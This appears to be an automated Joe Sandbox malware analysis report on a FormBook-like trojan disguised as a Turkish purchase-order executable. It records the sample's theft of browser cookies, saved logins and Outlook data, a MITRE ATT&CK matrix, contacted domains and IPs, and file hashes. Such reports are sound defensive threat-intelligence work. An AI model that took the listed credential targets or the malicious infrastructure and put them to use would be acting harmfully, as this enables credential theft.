            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
            Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Queries volume information: C:\ VolumeInformation
            Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\fc.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\fc.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match; File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 3.2.03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 00000009.00000002.4151312291.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.4152828319.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2136117245.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2137792677.0000000001C10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000B.00000002.4154513255.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.4152767044.0000000000B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000002.2137923561.0000000003A50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.4152697754.0000000004530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 11 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 12 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            [Behavior graph. ID: 1467071, Sample: 03.07.2024-sipari#U015f UG0..., Startdate: 03/07/2024, Architecture: WINDOWS, Score: 100]

            Source | Detection | Scanner | Label | Link
            03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe | 34% | ReversingLabs | Win32.Trojan.Generic |
            03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cn/cThe03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htm03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.galapagosdesign.com/DPlease03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fonts.com03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.sandoll.co.kr03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssfc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.urwpp.deDPlease03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.zhongyicts.com.cn03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1685588395.0000000002E8D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.sakkal.com03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.apache.org/licenses/LICENSE-2.003.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.ecosia.org/newtab/fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.carterandcone.coml03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://ac.ecosia.org/autocomplete?q=fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlN03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.founder.com.cn/cn03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers/frere-user.html03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.jsfc.exe, 00000009.00000002.4153435982.00000000040F0000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.00000000039E0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://valerieomage.com/k2gj?lxRlvTSh=ymeZBmicwKRkvYz1pzK8dvNYDsR2PzT6E62YqhKlQApFxMMJHFlv70ADTYJNZfc.exe, 00000009.00000002.4153435982.0000000004282000.00000004.10000000.00040000.00000000.sdmp, akwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4152791515.0000000003B72000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.jiyu-kobo.co.jp/03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://www.saalameh.comakwoJPEqdiyPQmCnaGzo.exe, 0000000B.00000002.4154513255.000000000516F000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.fontbureau.com/designers803.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe, 00000000.00000002.1720594400.00000000071B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=fc.exe, 00000009.00000003.2340849725.00000000075B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
IP | Domain | Country | ASN | ASN Name | Malicious
38.150.29.6 | qdfake525pm.xyz | United States | 174 | COGENT-174US | true
162.0.213.72 | www.devele.top | Canada | 35893 | ACPCA | false
162.209.189.212 | kloeti.pc205kopl.com | United States | 40065 | CNSERVERSUS | false
172.67.137.15 | www.hissmjkl.com | United States | 13335 | CLOUDFLARENETUS | false
23.227.38.74 | shops.myshopify.com | Canada | 13335 | CLOUDFLARENETUS | false
84.32.84.32 | saalameh.com | Lithuania | 33922 | NTT-LT-ASLT | false
217.160.0.87 | www.theweekendcreator.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
38.47.232.233 | ybw73.top | United States | 174 | COGENT-174US | false
46.30.211.38 | www.monchosoft.com | Denmark | 51468 | ONECOMDK | false
74.208.236.247 | www.kaps4kancer.org | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
3.33.130.190 | katgstamps.com | United States | 8987 | AMAZONEXPANSIONGB | false
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1467071
Start date and time: 2024-07-03 17:42:17 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
renamed because original name is a hash value
Original Sample Name: 03.07.2024-sipari UG01072410 - Onka ve Tic a.s .exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/7@15/11
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 90%
                                                      • Number of executed functions: 179
                                                      • Number of non-executed functions: 294
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                      • VT rate limit hit for: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
Time | Type | Description
11:43:08 | API Interceptor | 1x Sleep call for process: 03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe modified
11:43:09 | API Interceptor | 16x Sleep call for process: powershell.exe modified
11:44:31 | API Interceptor | 8821699x Sleep call for process: fc.exe modified
                                                      • 104.17.2.184
                                                      http://beetrootculture.comGet hashmaliciousUnknownBrowse
                                                      • 104.22.21.226
                                                      https://link.mail.beehiiv.com/ls/click?upn=u001.DTQiLe1mLQCNek4IXPrb3cd8am3-2BtbSaRRShUhZCbhF1FE2NDum-2B9YeqhMivZ-2FcIJGKdOjfqgyCSTZimAiOiNKkJG3N5vgYBNDNlk5YkmOU2XPb-2FKTFlF-2Fc7jFH7Nb8Q0JW6uJclJabjCcGs0cWdzdydwDpcxzScPZQBex7SofyQj6MGdYzEG8hbxGGqYt2bpR0NjPAx6JIYz6GJiSrQNg-3D-3DNN1n_VW5ZEdFpCuXmC2nf4fwMfiBmdui0O95PSMmp4s-2F2oS3jvSHISWr6XQl8RtHpD7TWmHpRBlT8NsCamUZaroeFibjayeskXeuNnFhPFOon1-2FD6SmbcpIEUC7jghzzXsggajKIODB16RJEeGNz4SFHe6mT-2Bn59v08ju13fD9NtKJQcr97qiQNjiGiaoQJcvN3gUurUBqLZp9I4f9bNW54ZUVVCzpwaogbLaWcL9oScbt8r4Ku34t9zOqlF27gTqXVf6T2MbNMKkoCYnb-2BuL8kIZdyoRM3EFOIuktrG5gMH3OTa1K2klBhmxFOQ2d7plqd5asAi8Ofl9YcYOh-2FL4f45riCQtSdd7jru06EkHcBuJahi-2BD3xm-2F7PbjpIpmn-2Bu7KYdjQeOSKE-2FSiD6UNxc7JQNRWkdnK1RTC7eoEMZms82uCa8fJQIoMgqBt91NrcdZIDONaGhhpHXRhQ1VbYp5h6Cow-3D-3D#?email=dmFsZXJpZS5jaHJ1c2NpZWxAb3Zlcmxha2Vob3NwaXRhbC5vcmc=Get hashmaliciousHTMLPhisherBrowse
                                                      • 104.17.25.14
                                                      ACPCA9098393827383039.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72
                                                      8bwKawHg0Z.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.94
                                                      HSBCscancopy-invoice778483-payment87476MT103.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72
                                                      Adjunto confirmacion de pedido.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      • 162.0.213.72
                                                      nJ8mJTmMf0.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72
                                                      yUFX4wGvLW.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 162.54.102.167
                                                      DHL Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72
                                                      Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72
                                                      Potvrda narudzbe u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                      • 162.0.213.72
                                                      Shipping Documents.exeGet hashmaliciousFormBookBrowse
                                                      • 162.0.213.72
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 - Onka ve Tic a.s .exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):1216
                                                      Entropy (8bit):5.34331486778365
                                                      Encrypted:false
                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1172
                                                      Entropy (8bit):5.355024937536926
                                                      Encrypted:false
                                                      SSDEEP:24:3OWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9t7J0gt/NKIl9r6dj:eWSU4y4RQmFoUeWmfmZ9tK8NDE
                                                      MD5:A2B58E2A44EE011B5A5204D75F038BDD
                                                      SHA1:44E14B097A6F628F0B0663EAA3059B5F0E5D7D8E
                                                      SHA-256:397D120EAAD7512D3923B9F86ADA33D54B60CC83655021C674258AA1F2AB68F0
                                                      SHA-512:1B27BD34FF787264BAF374DD8F61CAB416FBEE5A8E3D32AC4CF1A8A690D186F22A865D86D55790CEA6D360F4FEF4A55E2742A9EB9CFD1F650BD6B0AC278D621F
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:@...e................................................@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                      Process:C:\Windows\SysWOW64\fc.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):114688
                                                      Entropy (8bit):0.9746603542602881
                                                      Encrypted:false
                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
